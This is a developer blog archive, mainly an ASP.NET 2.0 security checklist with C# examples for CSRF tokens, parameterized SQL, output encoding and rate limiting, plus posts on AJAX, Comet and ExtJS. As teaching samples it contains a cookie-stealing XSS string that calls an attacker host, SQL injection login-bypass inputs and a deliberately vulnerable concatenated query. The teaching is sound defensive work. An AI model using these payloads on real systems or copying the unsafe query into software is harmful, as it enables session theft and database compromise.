Tuesday, December 11, 2007
(Links Updated On 29th December 2007)
Monday, December 10, 2007
Security is one of the critical components in the engineering of any web application, but unfortunately it isn’t always handled with the same seriousness. With the ever increasing popularity of providing access to information over the web at a mouse click, security concerns are growing at a similar pace.
Below I have jotted down a list of the major security related items (you can call them ASP.NET security best practices, a security checklist, or tips and tricks for engineering secure web applications in ASP.NET) which one must keep in mind while engineering an ASP.NET web application in which “SECURITY IS A CONCERN”.
My approach is not to provide a complete end to end solution for each concern, but to highlight each item in the checklist and give pointers to the different approaches for addressing it.
- You can use the built-in authentication mechanisms (Forms, Windows and Passport) or custom authentication. The usual custom approaches are session based (store a user specific value in the user’s session at the time of authentication and validate it on each subsequent request by the same user) and hidden field based (the traditional but insecure way of carrying authenticated user information, since a hidden field is sent by the client and can be edited by it). For an Internet facing application prefer Forms authentication: its ticket is encrypted and signed by the framework, which is exactly the part a home grown scheme usually gets wrong.
- You can use the built-in login controls provided in ASP.NET 2.0. Additionally, in order to have granular control over the user authentication process, refer to the Membership and Role Management API. In case you want the login controls / Membership API to work with your own database, you can write your own Membership and Role providers.
Encrypt sections of the configuration file having confidential information
- Whenever you need to put confidential information in the configuration file, such as the database user name and password, don’t leave it in plain text; encrypt that section using the built-in “aspnet_regiis” utility with the command line option “-pe” (and “-pd” to decrypt it again). The aspnet_regiis.exe is located at
- Once a section of web.config is encrypted, its contents aren’t human readable when the file is opened in a text editor. When the application reads the configuration through ASP.NET (the .NET 2.0 configuration API), the framework decrypts the section transparently and hands the actual values to the application. Keep in mind what this protects against: someone who can read the file but cannot run code as the application. Anything that runs under the application’s identity on that machine can still obtain the plain text.
- You can also use the configuration (management) API added in ASP.NET 2.0 to encrypt sections of web.config programmatically. That API is very rich: it gives you access to the complete configuration of the application and the ability to modify the configuration file on the fly.
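Here is what the programmatic route looks like. This is an added example, not code from the original post: it encrypts and decrypts a web.config section from C#, which is what “aspnet_regiis -pe connectionStrings -app /MyApp” (and “-pd” to reverse it) does from the command line. The “/MyApp” virtual path is an assumption.

```csharp
// Added example; not code from the original post. "/MyApp" is an assumed virtual path.
using System;
using System.Configuration;
using System.Web.Configuration;

public static class ConfigProtector
{
    // DataProtectionConfigurationProvider uses the machine's DPAPI key, so the encrypted
    // file is only readable on the server that encrypted it. For a web farm use
    // RsaProtectedConfigurationProvider with the same RSA key container imported on each box.
    public const string DefaultProvider = "DataProtectionConfigurationProvider";

    public static void Protect(string appVirtualPath, string sectionName, string providerName)
    {
        Configuration config = WebConfigurationManager.OpenWebConfiguration(appVirtualPath);
        ConfigurationSection section = config.GetSection(sectionName);
        if (section == null)
            throw new ArgumentException("No section named " + sectionName + " in web.config");

        if (!section.SectionInformation.IsProtected)
        {
            section.SectionInformation.ProtectSection(providerName);
            section.SectionInformation.ForceSave = true;
            // The plain text is replaced by an <EncryptedData> element in web.config.
            config.Save(ConfigurationSaveMode.Modified);
        }
    }

    public static void Unprotect(string appVirtualPath, string sectionName)
    {
        Configuration config = WebConfigurationManager.OpenWebConfiguration(appVirtualPath);
        ConfigurationSection section = config.GetSection(sectionName);
        if (section != null && section.SectionInformation.IsProtected)
        {
            section.SectionInformation.UnprotectSection();
            section.SectionInformation.ForceSave = true;
            config.Save(ConfigurationSaveMode.Modified);
        }
    }

    // Reading needs no special code: the framework decrypts the section transparently.
    public static string ConnectionString(string name)
    {
        ConnectionStringSettings settings = WebConfigurationManager.ConnectionStrings[name];
        return settings == null ? null : settings.ConnectionString;
    }
}

// Typical one-off call from an administrators-only page or a deployment step:
//   ConfigProtector.Protect("/MyApp", "connectionStrings", ConfigProtector.DefaultProvider);
```

The identity that runs this needs write access to web.config (and, for the RSA provider, read access to the key container). Saving web.config restarts the application, so do it at deployment time rather than on a busy site.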
One-way hash (not encrypt) the user passwords before storing them in the database
- Store only a salted one-way hash of the password, never the password itself or a reversible encryption of it. Later on, when the user wants to log in, hash the entered password using the same algorithm and the same stored salt and match the result with the hash in the database. If you use the built-in SqlMembershipProvider, leave its passwordFormat at the default, “Hashed”.
- In case the user has forgotten the password, provide an interface to set a new password after performing the necessary validations; you cannot send the old one back, because you no longer have it. You can e-mail the user a link to set a new password; make the token in that link random, single use and short lived.
Use database user having limited rights
- Create a user in the database that has limited rights (INSERT, UPDATE, SELECT and may be DELETE from specific tables) only those tables of the database that needs to be accessed by your web application, and use that user to access the database from within your application.
Show custom error pages with user friendly error messages
- Never show the built-in error page, with the complete error detail meant for debugging, to your end user. It discloses a lot of information (stack traces, file paths, connection strings, framework version) that is not intended for an end user and is very useful to an attacker.
- Show custom error pages with user friendly messages instead, while logging the actual error for the application developers to reproduce, debug and eventually resolve it. The customErrors element in web.config (mode="On" or "RemoteOnly" with a defaultRedirect) is the minimum; "RemoteOnly" keeps the detailed page available to a browser on the server itself.
- Always handle otherwise unhandled exceptions in the Application_Error event in Global.asax. Use Server.GetLastError() to get the detailed information about the error that occurred, log it, and then show the user the custom error page.
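An added example (not the original post’s code) of that Application_Error handler in Global.asax.cs. It assumes a customErrors entry in web.config such as <customErrors mode="RemoteOnly" defaultRedirect="~/Error.aspx" />; the event log source name “MyWebApp” and the page ~/Error.aspx are assumed names.

```csharp
// Added example; not code from the original post. "MyWebApp" and ~/Error.aspx are assumed names.
using System;
using System.Diagnostics;
using System.Web;

public class Global : HttpApplication
{
    protected void Application_Error(object sender, EventArgs e)
    {
        Exception error = Server.GetLastError();
        if (error == null)
            return;

        // Exceptions thrown while a page executes arrive wrapped in an HttpUnhandledException;
        // log the original one.
        Exception root = error.GetBaseException();

        string user = (Context.User != null && Context.User.Identity.IsAuthenticated)
            ? Context.User.Identity.Name
            : "(anonymous)";

        // Everything a developer needs to reproduce the problem goes to the log, never to the response.
        string entry = string.Format(
            "{0}: {1}\r\nURL: {2}\r\nUser: {3}\r\nClient: {4}\r\n{5}",
            root.GetType().FullName, root.Message, Request.RawUrl, user,
            Request.UserHostAddress, root.StackTrace);

        // The event source must be created at install time (it needs administrator rights);
        // the ASP.NET worker process identity only needs to write to it.
        EventLog.WriteEntry("MyWebApp", entry, EventLogEntryType.Error);

        // Drop the exception so ASP.NET does not render its own detailed page, then send the
        // user to the friendly one. Do not pass root.Message along to that page either.
        Server.ClearError();
        Response.Redirect("~/Error.aspx", false);
        CompleteRequest();
    }
}
```

Logging to the Windows event log is just one choice; the point is that the log has the details and the response does not. Make sure the custom error page itself cannot throw (no database calls, no session dependency), or the user ends up back on the default page.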
Check the Request’s Referrer Property
- Check that the request has actually originated from your own website (from the intended page) and not from a page on some other site that tricked the user’s browser into submitting it, which is known as cross site request forgery. Remember that the Referer header is supplied by the client: proxies and privacy settings often strip it, and a scripted client can set it to anything. So treat a missing or wrong referrer as a reason to reject a request that changes state, never a matching one as proof of authenticity, and back it up with a secret per-session token carried in the form.
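An added example (mine, not the original post’s) of the referrer check, together with the per-session token that makes it worth something. The method names, the hidden field name “__csrfToken” and the 403 responses are my choices for the illustration.

```csharp
// Added example; not code from the original post. Names are illustrative.
using System;
using System.Security.Cryptography;
using System.Web;
using System.Web.SessionState;

public static class OriginChecks
{
    private const string TokenKey = "__csrfToken";

    // True only when the Referer names this site's host. A missing header counts as a failure:
    // browsers do send it for ordinary form posts, but proxies and privacy settings may strip it,
    // and a scripted client can put anything in it, so a match is a weak signal while a
    // mismatch is a good reason to reject.
    public static bool IsFromOwnSite(Uri referrer, string expectedHost)
    {
        if (referrer == null) return false;
        return string.Equals(referrer.Host, expectedHost, StringComparison.OrdinalIgnoreCase);
    }

    // Random value created once per session; emit it as a hidden field in every form:
    //   <input type="hidden" name="__csrfToken" value="<%= OriginChecks.TokenFor(Session) %>" />
    public static string TokenFor(HttpSessionState session)
    {
        string token = session[TokenKey] as string;
        if (token == null)
        {
            byte[] bytes = new byte[32];
            new RNGCryptoServiceProvider().GetBytes(bytes);
            token = Convert.ToBase64String(bytes);
            session[TokenKey] = token;
        }
        return token;
    }

    // Call at the top of any handler that changes state (Page_Load of a form page, a button
    // click handler, a web service method). GET requests must not change state at all.
    public static void RequireOwnSite(HttpRequest request, HttpSessionState session)
    {
        if (request.HttpMethod != "POST")
            return;

        if (!IsFromOwnSite(request.UrlReferrer, request.Url.Host))
            throw new HttpException(403, "Request did not originate from this site.");

        string expected = session[TokenKey] as string;
        string supplied = request.Form[TokenKey];
        // An attacker's page on another site cannot read this session's token, so it cannot supply it.
        if (expected == null || supplied == null || !string.Equals(expected, supplied, StringComparison.Ordinal))
            throw new HttpException(403, "Missing or invalid form token.");
    }
}
```

The token check is the one that actually stops a forged request; the referrer check is a cheap extra filter. If the referrer check alone rejects too many legitimate users (corporate proxies are the usual cause), drop it and keep the token.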
Handle SQL Injection Attacks
- If you call stored procedures through SqlCommand with CommandType.StoredProcedure and SqlParameters, the user input never becomes part of the SQL text, and that call isn’t prone to SQL injection. It still is if the procedure itself builds dynamic SQL with EXEC from its arguments, or if you invoke it by concatenating an “EXEC …” string. Whether to use stored procedures at all in your web application is another debate; let’s not get into that and focus on handling SQL injection.
- The problem comes when you use inline queries and concatenate the user input into the SQL text. Well tailored input from an attacker, using single quotes and comment markers, can break your security checks (logging in without a password) and can possibly read or drop tables in your database. So concatenating user input as is into inline SQL queries can be fatal for your web application.
- Use SQL parameters even with inline queries; they automatically take care of SQL injection, because the statement text is fixed and the values are sent separately, typed, to the server.
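An added example, not the original post’s code, showing the vulnerable concatenation beside the parameterized forms. The Users table, its columns and the usp_UserExists procedure are assumed for the illustration.

```csharp
// Added example; not code from the original post. Table, columns and procedure names are assumed.
using System;
using System.Data;
using System.Data.SqlClient;

public static class LoginQueries
{
    // VULNERABLE, kept to show the problem: the user supplied strings become part of the SQL text.
    // A user name of      admin' --      turns the statement into
    //   SELECT COUNT(*) FROM Users WHERE UserName = 'admin' --' AND PasswordHash = ''
    // and the password check is commented out. A name of   x' OR 1=1 --   matches every row.
    public static string BuildInlineQuery_Unsafe(string userName, string passwordHash)
    {
        return "SELECT COUNT(*) FROM Users WHERE UserName = '" + userName +
               "' AND PasswordHash = '" + passwordHash + "'";
    }

    // SAFE: the same inline SQL, but the values travel as typed parameters. The statement text
    // is identical whatever the user types, so quotes and comment markers are just data.
    public static bool UserExists(SqlConnection conn, string userName, string passwordHash)
    {
        const string sql =
            "SELECT COUNT(*) FROM Users WHERE UserName = @UserName AND PasswordHash = @PasswordHash";
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@UserName", SqlDbType.NVarChar, 50).Value = userName;
            cmd.Parameters.Add("@PasswordHash", SqlDbType.NVarChar, 128).Value = passwordHash;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // A stored procedure is only safe when called like this. Building
    //   "EXEC usp_UserExists '" + userName + "', '" + passwordHash + "'"
    // and running it as CommandType.Text is inline SQL again, with the same hole.
    public static bool UserExistsViaProc(SqlConnection conn, string userName, string passwordHash)
    {
        using (SqlCommand cmd = new SqlCommand("usp_UserExists", conn))
        {
            cmd.CommandType = CommandType.StoredProcedure;
            cmd.Parameters.Add("@UserName", SqlDbType.NVarChar, 50).Value = userName;
            cmd.Parameters.Add("@PasswordHash", SqlDbType.NVarChar, 128).Value = passwordHash;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

Giving each parameter an explicit SqlDbType and length also stops an overlong value from being silently truncated into something different from what was checked elsewhere.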
Handle Cross Site Scripting Attacks
- ASP.NET’s default request validation doesn’t allow the user to submit input containing tags such as <script> and shows an error page (“A potentially dangerous Request.Form value was detected”) if such input is entered in a form field.
- Some applications may need to allow the user to enter information containing tags, which means turning request validation off (ValidateRequest="false") for that page. This opens the door to the security leak named cross site scripting. A user can write a <script> tag which may later be rendered to another user browsing the site. That script is executed in the context of the second user: an intelligently tailored script can read the second user’s cookies and send them elsewhere, and can submit requests with the second user’s credentials using XMLHttpRequest / AJAX.
- Use Microsoft’s AntiXSS library, or at the very least HttpUtility.HtmlEncode, to handle cross site scripting: encode every piece of user supplied data at the point where it is written into the page, for the context it lands in (HTML body, attribute, URL). Input filtering on its own is not enough, because data also enters the page from the database, query strings and other sites.
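An added example, not the original post’s code, of output encoding per context. HttpUtility ships with .NET 2.0; the AntiXSS library’s Microsoft.Security.Application.AntiXss class offers methods of the same names with a stricter white list approach and can be dropped in for them. The comment text is a constructed sample, not a real attack from anywhere.

```csharp
// Added example; not code from the original post. The hostile comment is a constructed sample.
using System;
using System.Web;

public static class SafeOutput
{
    // What a hostile user might have stored through a page with ValidateRequest="false":
    public const string HostileComment =
        "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>";

    // HTML body context (Label.Text, Literal.Text, Response.Write in the page body).
    // < > & " become entities, so the browser displays the text instead of running it.
    public static string ForHtml(string untrusted)
    {
        return HttpUtility.HtmlEncode(untrusted);
    }

    // Attribute context, e.g. <input value="...">. The quote that would close the attribute is encoded.
    public static string ForAttribute(string untrusted)
    {
        return HttpUtility.HtmlAttributeEncode(untrusted);
    }

    // A value placed into a query string of a link you build.
    public static string ForQueryStringValue(string untrusted)
    {
        return HttpUtility.UrlEncode(untrusted);
    }

    // A user supplied URL used as an href. Encoding does not help here: "javascript:alert(1)"
    // contains nothing to encode. Only accept the schemes you expect.
    public static string ForHref(string untrusted)
    {
        Uri uri;
        if (untrusted != null
            && Uri.TryCreate(untrusted, UriKind.Absolute, out uri)
            && (uri.Scheme == Uri.UriSchemeHttp || uri.Scheme == Uri.UriSchemeHttps))
        {
            return HttpUtility.HtmlAttributeEncode(uri.AbsoluteUri);
        }
        return "#";
    }

    // How a page would use it: store exactly what the user typed, encode while rendering.
    public static string RenderComment(string author, string storedComment, string homepage)
    {
        return "<div class=\"comment\"><a href=\"" + ForHref(homepage) + "\" title=\""
             + ForAttribute(author) + "\">" + ForHtml(author) + "</a>: "
             + ForHtml(storedComment) + "</div>";
    }
}

// SafeOutput.RenderComment("mallory", SafeOutput.HostileComment, "javascript:alert(1)")
// yields a link to "#" and the comment shown literally as &lt;script&gt;...&lt;/script&gt;.
```

Note that standard controls differ: a Literal or Label writes its Text as is, while a TextBox encodes its Text for you. When in doubt, encode explicitly, and never place user data inside a <script> block at all, since HtmlEncode is the wrong encoding for that context.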
Handle Dictionary Attacks – Captcha
- Attackers can target your authentication system and submit automated login requests to guess the passwords of your users (a dictionary or brute force attack). Make sure your login form is being used by a human, by asking the user to enter the characters shown on a distorted but human readable image (a CAPTCHA), and combine that with account lockout: the built-in Membership provider’s maxInvalidPasswordAttempts and passwordAttemptWindow settings do this for you. Log failed attempts as well, so that a guessing campaign is visible. For more information on dictionary attacks refer to Wikipedia.
Denial of Service Attacks
- When everything else fails, an attacker may simply try to overwhelm your website: a denial of service attack. Track the activity of each client and cap the number of repeated requests accepted from the same IP in a given period at a sensible figure. Keep in mind that this only protects you from a single noisy client; a distributed flood has to be absorbed upstream of the web server, by the network or the hosting provider.
- You can use the ASP.NET AJAX Control Toolkit’s NoBot control to help with automated form submissions, but, as its own documentation states, it should be used with caution: it is a heuristic, not a guarantee.
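An added example, not from the original post, of the per-IP request cap just described, as an HttpModule with a fixed one-minute window. The limit, the window and the module name are assumptions; tune them for your site.

```csharp
// Added example; not code from the original post. Limit and window are assumed values.
// Register in web.config:  <httpModules><add name="RateLimit" type="RateLimitModule"/></httpModules>
using System;
using System.Collections.Generic;
using System.Web;

public class RateLimitModule : IHttpModule
{
    private const int MaxRequestsPerWindow = 120;                   // assumed limit
    private const int MaxTrackedClients = 10000;                    // prune the table above this
    private static readonly TimeSpan Window = TimeSpan.FromMinutes(1);
    private static readonly Dictionary<string, Counter> counters = new Dictionary<string, Counter>();
    private static readonly object sync = new object();

    private class Counter
    {
        public DateTime WindowStart;
        public int Count;
    }

    public void Init(HttpApplication app)
    {
        app.BeginRequest += new EventHandler(OnBeginRequest);
    }

    public void Dispose() { }

    private void OnBeginRequest(object sender, EventArgs e)
    {
        HttpApplication app = (HttpApplication)sender;
        // Behind a load balancer or reverse proxy every request carries the proxy's address;
        // use the forwarded address only if the proxy is yours and strips it from outside traffic.
        string client = app.Request.UserHostAddress;

        if (!Allow(client, DateTime.UtcNow))
        {
            app.Response.StatusCode = 503;
            app.Response.AppendHeader("Retry-After", "60");
            app.Response.Write("Too many requests. Please try again later.");
            app.CompleteRequest();   // cheap rejection: no page, no database, no session
        }
    }

    // Returns false once the client has exceeded MaxRequestsPerWindow in the current window.
    public static bool Allow(string clientKey, DateTime now)
    {
        lock (sync)
        {
            Counter c;
            if (!counters.TryGetValue(clientKey, out c) || now - c.WindowStart >= Window)
            {
                c = new Counter();
                c.WindowStart = now;
                counters[clientKey] = c;
            }
            c.Count++;

            if (counters.Count > MaxTrackedClients)
                Prune(now);

            return c.Count <= MaxRequestsPerWindow;
        }
    }

    // Drops clients whose window has expired so the table cannot grow without bound
    // (an attacker spoofing many source addresses would otherwise exhaust memory).
    private static void Prune(DateTime now)
    {
        List<string> stale = new List<string>();
        foreach (KeyValuePair<string, Counter> kv in counters)
            if (now - kv.Value.WindowStart >= Window)
                stale.Add(kv.Key);
        foreach (string key in stale)
            counters.Remove(key);
    }
}
```

The table is per worker process, so on a web garden or farm each process counts separately; for a farm, keep the counters in a shared store or do the limiting on the load balancer instead.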
Log user activity
- This way you not only capture some very useful data about user trends, but that data can also help you detect any undesired activity by a user. Log who did what, when, from which IP address and whether it succeeded; never log passwords, session identifiers or other secrets.
- You can use the Enterprise Library Logging Application Block to log the user activity. It can write to a database (among other destinations), so that you can later query the log and create reports on it to find interesting patterns in user behaviour as well as to point out any undesired user activity.
I hope this pretty much covers most of the security checklist items. However, I will keep adding to it, to provide an up to date, comprehensive guide for engineering secure web apps in ASP.NET 2.0.
So, I decided to share “My Proposed Strategy of Learning ASP.NET 2.0” over here for people to look at and get started. The points listed below don’t apply to everyone; that varies with a person’s level of exposure to engineering web applications.
My strategy is to start from the basics and finally conclude by providing pointers to resources for engineering more sophisticated applications in ASP.NET 2.0.
Know how of Client-Server Interaction in Web Apps
Once you are done with the basics, you should have an idea of the interaction between the client (web browser) and the web server (IIS etc.) in any web based application.
The client sends a request to the server, the server processes that request and finally sends the response back to the client. So it’s a “request/response” based interaction between the web client and the web server.
Moreover, HTTP itself is stateless: each request is independent of the previous one. Wherever user state has to be kept between successive requests from a single client, the server hands the client a cookie, which the browser sends back with every later request. The cookie either carries the state itself (client side state) or just a session identifier that keys state kept on the server (server side state, which is what ASP.NET Session uses).
Know how of Implicit Objects in any Server Side Scripting Language
After that, a person should have an idea of what a server side scripting language is and of the implicit objects available in it, as well as the capability and role of each of those implicit objects. Those implicit objects include Request, Response, Server, Application and Session.
Once you are done with this much background knowledge, you should have the right development tools / IDE as well as the .NET 2.0 Framework (which also comes packaged with the IDE) installed on your machine. If you have Visual Studio 2005 available, well and good, as it will install the Framework, the IDE and SQL Server 2005 Express through a single install package. Otherwise you can download and install the free versions: Visual Web Developer 2005 Express Edition (the IDE for ASP.NET 2.0, which contains the .NET Framework 2.0) and SQL Server 2005 Express Edition (the backend database server). You can download them for free from the Microsoft website, i.e. http://www.microsoft.com/express/2005/download/default.aspx
ASP.NET 2.0 Beginners / How Do I Video Tutorials
A picture is worth a thousand words, and a guided video has much more impact. So I recommend people view webcasts on ASP.NET 2.0 and related topics to get a better and quicker insight into it. The official ASP.NET website provides a very good pool of video tutorials on ASP.NET 2.0 which I strongly recommend people download, watch and eventually apply. You can go to http://www.asp.net/learn/videos/#beginners for those video tutorials.
ASP.NET 2.0 Quickstart Samples
By now you must be able to develop a reasonable small sized web application in ASP.NET 2.0. However, you still need some samples / code examples and a quick description of each feature of ASP.NET 2.0. Here the excellently tailored ASP.NET 2.0 Quickstarts serve the purpose. You can go to the official ASP.NET website, http://quickstarts.asp.net/, for an online version of these code examples and related descriptions of each of the features of ASP.NET 2.0. The code samples in these Quickstarts are available in both C# and VB.NET, depending on user preference.
Microsoft Patterns & Practices: Enterprise Library
People at Microsoft Patterns & Practices are working quite devotedly to provide you with the libraries and APIs needed for the development of your applications on the .NET Framework. You can leverage their very first initiative, the Enterprise Library, which has evolved over time and is quite mature now. You can get the latest version, 3.1, which works with .NET Framework 2.0 / 3.0 / 3.5, from http://www.codeplex.com/entlib
Microsoft Patterns & Practices: Software Factories
Still need some more pointers to engineer a more sophisticated web application? Look at the Software Factories, another great initiative of the Microsoft Patterns & Practices team. Refer to the Web Client Software Factory on CodePlex for more details.
The Data Access Application Block, Logging Application Block and Caching Application Block of the Enterprise Library are the ones one must try. I can guarantee that you will find them really helpful in engineering your applications without bothering much about these common functionalities.
I also strongly recommend that all those who want quick hands-on experience with ASP.NET 2.0 install the Quickstarts locally on their own development machines (available under the Microsoft .NET Framework 2.0 SDK in the Visual Studio 2005 installer) and go through the topics and code samples whenever they are free. This will really help you get a broader idea of the capabilities of ASP.NET 2.0.
Wednesday, November 28, 2007
Here I will try to explain what Comet actually is. So let’s start with the basics. HTTP is based on the pull model: the client sends a request to the server, the server processes that request and sends the response back to the client. This conventional way leads to serious bandwidth, network traffic and scalability issues for web applications that need to provide real time information, i.e. a news ticker, stock quotes or a web based chat client. Given this pull model of HTTP, the web application simulates real time updates of the news / stock quotes ticker by periodically sending AJAX requests using JavaScript timers or a similar approach. So in that case my application is generating periodic XMLHttpRequests regardless of whether there are any updates on the server or not, which leads to substantial overhead in terms of network bandwidth and the web server’s scalability and performance. This way of simulating real time updates is called polling (the “ping model”), in which you are continuously pinging the server to get whatever updated content is available on it.
What if I don’t want to ping the server for updates? What if I want the web server itself to notify the client whenever there is an update? Can we really do that? Is it possible over HTTP? Is it possible in ASP.NET + IIS? These are the questions that must be in your mind by now.
What I can say about all this is that several giants are into it; Google is achieving this somehow in its Google Talk web chat panel inside the GMail web based interface, and Meebo is also providing that server push kind of thing for its web chat platform. There are also several (experimental and commercial) implementations of Comet available out there.
Still, I have serious doubts about the scalability of any such solution. What we know is that HTTP is based on the pull model, so how can these implementations achieve a real server push over HTTP? As far as I can tell, they are simulating server push using long-lived HTTP requests (the client opens a request that the server deliberately leaves open until it has something to send, known as long polling or streaming). The other option to achieve server push is to bypass HTTP and use raw TCP sockets, but that would lead to many other concerns related to security, scalability etc.
Another way to achieve server push on the web is using sockets in Flash movies; these Flash movies can be easily embedded in web pages that are served over HTTP, but in that case we need a Flash Communication Server. Thus even for that, something is required on the server side to achieve this push kind of behaviour in web applications that provide real time information on web pages.
So far, Microsoft is quiet on this. Let’s see how things turn out from their end.
Below are a few links to related articles and working samples to increase your urge to learn more and more about Comet.
Monday, November 26, 2007
If you have any of the below questions in your mind, then I would recommend you to continue reading this post.
- Is it a tool?
- Is it a language?
- Is it a technology?
- Is it a library?
- Is it a technique?
- What’s so special about AJAX?
- What’s working behind the scenes in AJAX?
- Can’t we do the same trick if we don’t have the XMLHttpRequest object available in browsers?
- Can’t we make an AJAX request synchronous?
- How does AJAX improve the responsiveness of a web application?
- Is the round-trip eliminated in case of AJAX?
- When to use AJAX?
Here are the points one needs to remember about AJAX, so as to have a clear understanding of what it actually is, what’s working behind the scenes, what its alternatives are, and when to use it and when not to.
- “AJAX is a technique” to make web applications more responsive, by enabling application developers to “seamlessly make a request to the server without the need to post back the complete page”, in order to provide a better user experience.
- The core object that’s working behind the scenes to seamlessly make a request to the server, and is available in all modern browsers, is “XMLHttpRequest” (or the “Microsoft.XMLHTTP” ActiveX object in older versions of Internet Explorer).
- There are “many libraries/frameworks written on top of the XMLHttpRequest / Microsoft.XMLHTTP” object that facilitate AJAX based development. ASP.NET AJAX is one of the hundreds of frameworks available for free to ASP.NET developers to incorporate AJAX features in their ASP.NET based web applications.
- “We can make synchronous requests” with XMLHttpRequest too (the third argument to its open() call set to false), although that blocks the browser’s user interface until the response arrives, which defeats the purpose in most cases.
- AJAX “doesn’t eliminate the round-trip to the server”; it’s not the case that all the data required by the page is sent to the client when the page is first rendered, and such an approach would (in most cases) result in a performance hit. It is actually “on-demand fetching of the required data, based on user actions / timers, in a seamless fashion to provide a better user experience”.
- “Use AJAX in order to improve the user experience”. Keep the end use of your web application in mind while you are engineering the application. This is the real key to making a successful web product / application.
- “Use AJAX in order to minimize the overall network traffic” created by your web application.
- “Don’t use AJAX to the extent that makes the response of your web application unpredictable for an end user”.
I will be providing a quick review of ASP.NET AJAX and its Programming Models in a week or so, keep your fingers crossed.
A couple of weeks back, I attended a seminar on “Secrets of Internet Marketing with Google” at my university; LUMS.
The session started with case studies on Google’s AdWords, presented by CEOs / Technical Consultants of
After that Badar Khushnood; Country Consultant of Google Pakistan at Google Inc., presented an enlightening and quite a convincing presentation on the said topic.
I had known for quite some time that Google shows relevant sponsored text ads with search results, but I never knew that even a person like me can design a marketing campaign, at an affordable cost, using Google AdWords.
I heard quite a few surprising facts about internet marketing with Google at the seminar and would like to share some of those with you, so that you can use them too to increase the market share of your products / services.
- “ShopHive”, a Pakistani shopping portal with monthly revenue of around 5 million Rs, is using Google AdWords and has a competitive edge over “MyShop” because of the targeted audience.
- “CottonSocks” is reaching its targeted export audience by using Google AdWords and is happy with the overall cost / benefit ratio; the same is the case with “LumeSoft”.
- Google “doesn’t charge you just for displaying your ads” in the sponsored ads panel of its search results. You are only charged when a user browsing the search results actually clicks on your ad.
- There is a “cost per click (CPC)” on your ad, and it depends on the keyword you have chosen, against which your ad is shown to a user who searches for that word or any related word.
- You can reach your “targeted audience” with Google AdWords. You can design your marketing campaign such that your ads are displayed only to users browsing the web from a particular geographical area; e.g. you can limit your ads to users who are browsing the search results from Lahore only.
- You can tailor “any number of ads” to be displayed in the sponsored links panel of Google search results.
- You can display your ad as a sponsored link on the Google search results page with daily expenditure as low as $1, i.e. 60 Rs only, which is far lower than any other medium of advertising and much more effective. In essence you can “define your daily budget for the ads” to be displayed.
- Google also offers “certifications in Google AdWords”, which one can opt for as a consultant to attract more and more companies to get consultation from him/her.
Sunday, November 25, 2007
Although the use of the UpdatePanel can do wonders in making a traditional ASP.NET application a bit more responsive, I have always been eager to make the application responsive with minimal network traffic, and that’s not the case when we use the ASP.NET AJAX UpdatePanel (it still posts back and re-renders the whole panel’s markup).
A quick walkthrough on how to bind the data returned from the server to an ExtJS based grid is outlined below.
- Get the data from the server (for example a List<Employee> of Employee objects) using ASP.NET AJAX Page Methods.
- Define the ExtJS based “Record” that maps the Employee C# class to an ExtJS employee “Record” type.
- Define the ExtJS based “JsonReader” and associate that reader with the employee “Record” type you have just defined in ExtJS.
- Define the ExtJS based “Store” and load the returned List<Employee> into that store using the reader you have already defined.
- Now you can bind this ExtJS based “Store” to any ExtJS based “GridPanel” or select list, or use the store as a temporary data place holder for further manipulation later on.
The tricky part is reading the returned list of employees in the “JsonReader” and loading it into the “Store”; once the data is loaded in the Store, you can bind it to any data bound ExtJS control or manipulate it later on.
On the request of one of the readers, Imtiaz, here is the sample code of the above walkthrough. [Added: 14/12/2007]
ExtJS is compatible with all modern browsers, and can be used for free under its open source license or under a commercial license. For more details on licensing, refer to the ExtJS website, i.e. http://www.extjs.com/
A few sample UIs (snapshots of the ExtJS examples) made with the ExtJS UI framework are shown below to give you an idea of what we can get out of ExtJS.
Saturday, November 24, 2007
Along with my other plans on how to spend these holidays, like spending some healthy time with my parents, I plan to update my blog with my experiences so far, old and new, including but not limited to stuff like Comet, AJAX + ASP.NET AJAX 1.0, FxCop, Firebug + YSlow, Sandcastle, the MVC Framework for ASP.NET, C# 3.0 / .NET 3.5, Web Client Software Factory, the Provider Model, Google AdWords etc. Let’s see how successful I am in sharing some really exciting information on the said topics I have learnt through my experience working with them.
Monday, November 05, 2007
.NET 3.0 adds four frameworks, namely Windows Communication Foundation (WCF), Windows Workflow Foundation (WF), Windows Presentation Foundation (WPF) and CardSpace, on top of .NET 2.0 (the CLR and base class library are unchanged), and Microsoft named the resulting framework .NET 3.0 (a marketing tactic).
Similarly .NET 3.5 adds Language Integrated Query (LINQ), the ASP.NET AJAX extensions and a REST style (Representational State Transfer) web programming model for WCF on top of .NET 3.0, along with the C# 3.0 / VB 9 compilers, and the result was named .NET 3.5.
Thursday, September 13, 2007
Steve Souders has jotted down fourteen simple tips and tricks to improve website performance.
- Make fewer HTTP requests
- Use a CDN
- Add an Expires header
- Gzip components
- Put CSS at the top
- Move JS to the bottom
- Avoid CSS expressions
- Make JS and CSS external
- Reduce DNS lookups
- Minify JS
- Avoid redirects
- Remove duplicate scripts
- Turn off ETags
- Make AJAX cacheable and small
You can download his complete presentation on the said topic at Web 2.0 Expo conference from here
Wednesday, September 12, 2007
That’s a really good sign that people understand the complexities of such client centric approaches to web development and have started finding ways to abstract and better organize them through such server side frameworks, while maintaining their inherent user experience.
For the actual UI Library by Yahoo refer to http://developer.yahoo.com/yui/